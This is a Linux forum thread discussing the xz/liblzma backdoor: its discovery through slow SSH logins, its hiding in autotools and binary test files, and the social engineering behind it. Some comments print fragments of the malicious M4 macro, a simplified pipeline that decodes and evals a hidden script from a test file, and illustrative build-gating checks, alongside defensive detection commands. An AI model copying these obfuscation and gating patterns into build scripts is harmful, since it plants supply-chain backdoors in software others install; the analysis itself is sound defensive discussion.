1200 points
submitted 01 Apr 2024 by possiblylinux127@lemmy.zip to c/linux@lemmy.ml
[-] Aatube@kbin.melroy.org 234 points 7 months ago

Don't forget all of this was discovered because ssh was running 0.5 seconds slower

[-] Steamymoomilk@sh.itjust.works 94 points 7 months ago

It's toooo much bloat. There must be malware XD Linux users at their peak!

[-] rho50@lemmy.nz 94 points 7 months ago* (last edited 6 months ago)

Tbf 500ms latency on - IIRC - a loopback network connection in a test environment is a lot. It's not hugely surprising that a curious engineer dug into that.

[-] Jolteon@lemmy.zip 80 points 7 months ago

Half a second is a really, really long time.

[-] lurch@sh.itjust.works 25 points 7 months ago

Reminds me of Data after the Borg Queen incident.

[-] imsodin@infosec.pub 52 points 7 months ago

Technically that wasn't the initial entry point; paraphrasing from https://mastodon.social/@AndresFreundTec/112180406142695845:

It started with sshd using an unreasonable amount of CPU, which interfered with benchmarks. Profiling then showed the CPU time being spent in liblzma, without being attributable to anything. And he remembered earlier valgrind issues. Those valgrind issues only came up because he had set some build flag he doesn't even remember why he set. On top of that, he ran all of this on Debian unstable to catch (unrelated) issues early. Had any of these factors been missing, he wouldn't have caught it. All of this is so nuts.
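
(For the curious, the tooling for that kind of hunt looks roughly like this; a sketch of the general approach, not Freund's actual workflow, which is described in the linked thread.)

  # Sample system-wide CPU while the benchmark logins run (as root).
  # In the real case this showed cycles inside liblzma that couldn't
  # be attributed to any sane symbol.
  perf top

  # The earlier warnings he remembered came from runs along these lines
  # (the target binary here is a stand-in):
  valgrind --error-exitcode=1 ./my_test_binary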

[-] possiblylinux127@lemmy.zip 47 points 7 months ago

Postgres sort of saved the day

[-] oce@jlai.lu 33 points 7 months ago

Is that from the Microsoft engineer or did he start from this observation?

[-] whereisk@lemmy.world 45 points 7 months ago

From what I read, it was this observation that led him to investigate the cause. But this is the first time I've read that he's employed by Microsoft.

[-] merthyr1831@lemmy.world 125 points 7 months ago

I know this is being treated as a social engineering attack, but having unreadable binary blobs as part of your build/dev pipeline is fucking insane.

[-] suy@programming.dev 39 points 7 months ago

Is it, really? If the whole point of the library is dealing with binary files, how are you even going to have automated tests of the library without them?

The scary thing is that there are people still using autotools, or any other hyper-complicated build system in which this is easy to hide, because who the hell wants to learn Makefiles, autoconf, automake, M4 and shell scripting all at once just to compile a few C files? I think hiding this in any other build system would have been definitely harder. Check out this mess:

  dnl Define somedir_c_make.
  [$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
  dnl Use the substituted somedir variable, when possible, so that the user
  dnl may adjust somedir a posteriori when there are no special characters.
  if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
    [$1]_c_make='\"$([$1])\"'
  fi
  if test "x$gl_am_configmake" != "x"; then
    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
  else
    gl_[$1]_config=''
  fi
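
For those who don't read M4: once autoconf expands the macro, the generated configure script ends up holding a command string that, per the published analyses, resolved to something roughly like this (a simplified rendering, not the literal generated code):

  # What the injected build-to-host.m4 reportedly boiled down to:
  gl_am_configmake=tests/files/bad-3-corrupt_lzma2.xz  # the "corrupt" test blob
  gl_path_map='tr "\t \-_" " \t_\-"'                   # byte swap that un-corrupts it
  # 'sed "r\n" <file>' is just an obfuscated cat; the tr call repairs the
  # deliberately mangled stream, and xz -d yields a shell script that the
  # build then evals.
  sed "r\n" "$gl_am_configmake" | eval "$gl_path_map" | xz -d 2>/dev/null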
[-] nxdefiant@startrek.website 26 points 7 months ago* (last edited 7 months ago)

It's not uncommon to keep example bad data around for regression tests to run against, and I imagine that's not the only such file in a compression library. But I'd definitely consider that a level of testing above unit tests, and would not include it in the main repo. Tests that verify behavior at run time (interacting with the user, integrating with other software or services, or running after being packaged) belong elsewhere. In summary, this is lazy.

[-] xlash123@sh.itjust.works 24 points 7 months ago

As mentioned, binary test files make sense for this utility. In the future, though, maintainers should be expected to demonstrate how and why the binary files were constructed, kind of like how encryption algorithms explain how they derived any arbitrary or magic numbers. This would bring more trust and transparency to these files without having to eliminate them.
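
Something as small as a checked-in generation script would do it. A hypothetical example for a compression library's "bad magic bytes" fixture:

  #!/bin/sh
  # gen-bad-magic.sh (hypothetical): regenerate tests/files/bad-magic.xz
  # deterministically, so reviewers can reproduce the blob instead of
  # having to trust an opaque binary in the repo.
  set -eu
  printf 'hello\n' | xz -9 > bad-magic.xz
  # Corrupt the first byte of the 6-byte xz magic (FD 37 7A 58 5A 00):
  printf '\000' | dd of=bad-magic.xz bs=1 count=1 conv=notrunc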

[-] d3Xt3r@lemmy.nz 98 points 7 months ago

This is informative, but unfortunately it doesn't explain how the actual payload works - how does it compromise SSH exactly?

[-] Aatube@kbin.melroy.org 49 points 7 months ago

It allows a patched SSH client to bypass SSH authentication and gain access to a compromised computer

[-] d3Xt3r@lemmy.nz 66 points 7 months ago* (last edited 7 months ago)

From what I've heard so far, it's NOT an authentication bypass, but a gated remote code execution.

There's some discussion on that here: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

But it would be nice to have a diagram like OP's to understand how exactly it does the RCE and implements the SSH backdoor. If we understand how, maybe we can take measures to prevent similar exploits in the future.
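
In the meantime, the practical check was simply making sure you weren't running one of the trojaned releases (5.6.0 and 5.6.1). A rough sketch; your distro's advisory is the authoritative source:

  xz --version                          # affected upstream releases: 5.6.0, 5.6.1
  ldd /usr/sbin/sshd | grep -i lzma     # is liblzma even in your sshd's address space?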

[-] underisk@lemmy.ml 28 points 7 months ago

I think ideas about prevention should be more concerned with the social engineering aspect of this attack. The code itself is certainly cleverly hidden, but any bad actor who gains the kind of access that Jia did could likely pull off something similar without duplicating their specific method or technique.

[-] UnityDevice@startrek.website 96 points 7 months ago

If this was done by multiple people, I'm sure the person that designed this delivery mechanism is really annoyed with the person that made the sloppy payload, since that made it all get detected right away.

[-] fluxion@lemmy.world 33 points 7 months ago

I hope they are all extremely annoyed and frustrated

[-] refreeze@lemmy.world 79 points 7 months ago

I have been reading about this since the news broke and still can't fully wrap my head around how it works. What an impressive level of sophistication.

[-] rockSlayer@lemmy.world 83 points 7 months ago* (last edited 7 months ago)

And due to open source, it was still caught within a month. Nothing could convince me more of how secure FOSS can be.

[-] lung@lemmy.world 94 points 7 months ago

Idk if that's the right takeaway; it's more like "oh shit, there are probably many of these long-con contributors out there, and we just happened to catch this one because it was a little sloppy due to the 0.5s thing".

This shit got merged. Binary blobs and hex-digit replacements, in low-level code that many things use. Just imagine how often there's no oversight at all.

[-] rockSlayer@lemmy.world 49 points 7 months ago

Yes, and the moment this broke, other project maintainers started looking for similar exploits. They read the same news we do and have the same concerns.

[-] lung@lemmy.world 21 points 7 months ago

Very generous to imagine that maintainers have so much time on their hands

[-] Corngood@lemmy.ml 18 points 7 months ago

I wonder if anyone is doing large-scale searches for source releases that differ in meaningful ways from their corresponding public repos.

It's probably tough due to autotools and that sort of thing.
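
The naive version is easy enough to script; doing it at scale without drowning in legitimately generated autotools files is the hard part. A sketch using xz itself (the tarball URL is a stand-in):

  # Fetch a release tarball and the matching git tag, then diff them.
  curl -LO https://example.org/pub/xz-5.6.1.tar.gz   # stand-in URL
  tar xf xz-5.6.1.tar.gz
  git clone --depth 1 --branch v5.6.1 https://github.com/tukaani-project/xz.git xz-git
  # Expect noise from generated files (configure, Makefile.in, aclocal.m4...);
  # the malicious m4/build-to-host.m4 shows up as tarball-only.
  diff -r xz-5.6.1 xz-git | less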

[-] Quill7513@slrpnk.net 28 points 7 months ago

I was literally compiling this library a few nights ago and didn't catch shit. We caught this one, but I'm sure there are a bunch of "bugs" we've squashed over the years, long after they were introduced, that were working just as intended like this one.

The real scary thing to me is the notion that this was state-sponsored, and how many things like this might be hanging out in proprietary software for years on end.

[-] alphafalcon@feddit.de 34 points 7 months ago

Coconut at least...

[-] JoeKrogan@lemmy.world 48 points 7 months ago

I think going forward we need to look at packages with a single maintainer, or only a few, as likely target candidates. Especially if they are as widespread as this one was.

In addition, I think security needs to be a higher priority too: no more patching fuzzers to allow that one program to compile. Fix the program.

I'd also love to see systems hardened by default.

[-] Potatos_are_not_friends@lemmy.world 40 points 7 months ago* (last edited 7 months ago)

In the words of the devs in that security email (I'm paraphrasing):

"Lots of people giving next steps, not a lot of people lending a hand."

I say this as a person not lending a hand. This stuff is over my head and outside my industry knowledge and experience, even after I spent the whole weekend piecing everything together.

[-] amju_wolf@pawb.social 31 points 7 months ago

Packages or dependencies with only one maintainer that are this popular have always been an issue, and not just a security one.

What happens when that person can't afford to or doesn't want to run the project anymore? What if they become malicious? What if they sell out? Etc.

[-] girlfreddy@lemmy.ca 45 points 7 months ago

A small blurb from The Guardian on why Andres Freund went looking in the first place.

So how was it spotted? A single Microsoft developer was annoyed that a system was running slowly. That’s it. The developer, Andres Freund, was trying to uncover why a system running a beta version of Debian, a Linux distribution, was lagging when making encrypted connections. That lag was all of half a second, for logins. That’s it: before, it took Freund 0.3s to login, and after, it took 0.8s. That annoyance was enough to cause him to break out the metaphorical spanner and pull his system apart to find the cause of the problem.
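
A regression like that is trivial to reproduce once you think to look. Something like this (assuming a local sshd and key-based auth) is all it takes:

  # Wall-clock a no-op login a few times; 0.3s vs 0.8s is unmissable.
  for i in 1 2 3; do
      time ssh -o BatchMode=yes localhost true
  done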

[-] index@sh.itjust.works 32 points 7 months ago

Give this guy a medal and a mastodon account

[-] noddy@beehaw.org 30 points 7 months ago

The scary thing about this is thinking about potential undetected backdoors similar to this existing in the wild. Hopefully the lessons learned from the xz backdoor will help us to prevent similar backdoors in the future.

[-] KillingTimeItself@lemmy.dbzer0.com 25 points 7 months ago

This was one hell of an April Fools joke, I tell you what.

[-] luthis@lemmy.nz 21 points 7 months ago

I have heard multiple times from different sources that building from git source instead of using tarballs invalidates this exploit, but I do not understand how. Is anyone able to explain that?

If malicious code is in the source, and therefore in the tarball, what's the difference?

[-] Aatube@kbin.melroy.org 47 points 7 months ago

Because m4/build-to-host.m4, the entry point, is not in the git repo; it was added to the release tarballs by the malicious maintainer.
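
You can see the difference directly (a sketch, assuming you've already fetched the 5.6.1 tarball and a clone of the repo):

  # Present in the release tarball...
  tar -tf xz-5.6.1.tar.gz | grep build-to-host.m4
  # ...but absent from the repository at the same tag:
  git -C xz-git ls-tree -r --name-only v5.6.1 | grep build-to-host.m4 \
      || echo "not in git"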

[-] harsh3466@lemmy.ml 21 points 7 months ago* (last edited 7 months ago)

I don’t understand the actual mechanics of it, but my understanding is that it’s essentially like what happened with Volkswagen and their diesel emissions testing scheme, where the software had a way to know it was being emissions-tested and adapted to that.

The malicious actor had a mechanism that exempted the malicious code when built from source, presumably because it would be more likely to be noticed when building/examining the source.

Edit: a bit of grammar. Also, this is my best understanding based on what I’ve read and the videos I’ve watched, but a lot of it is over my head.
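
From the published analyses, the "defeat device" analogy is apt: the injected script reportedly bailed out unless the build environment looked like a distro package build. Condensed illustratively (made-up shell, not the actual obfuscated code):

  # Only proceed on x86-64 Linux with the expected target triple...
  [ "$(uname)" = Linux ] || exit 0
  case "$build" in
      x86_64-*linux-gnu) ;;   # $build as set by configure
      *) exit 0 ;;
  esac
  # ...and only when a .deb or .rpm is being produced (a distro package,
  # not a developer build straight from git):
  if ! test -f debian/rules && test "x$RPM_ARCH" != "xx86_64"; then
      exit 0
  fi
  # ...only then does it go on to patch the object files during the build.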

[-] umbrella@lemmy.ml 20 points 7 months ago

Did we find out who that guy was and why he was doing it?

[-] fluxion@lemmy.world 21 points 7 months ago

It was Spez trying to collect more user data to make Reddit profitable
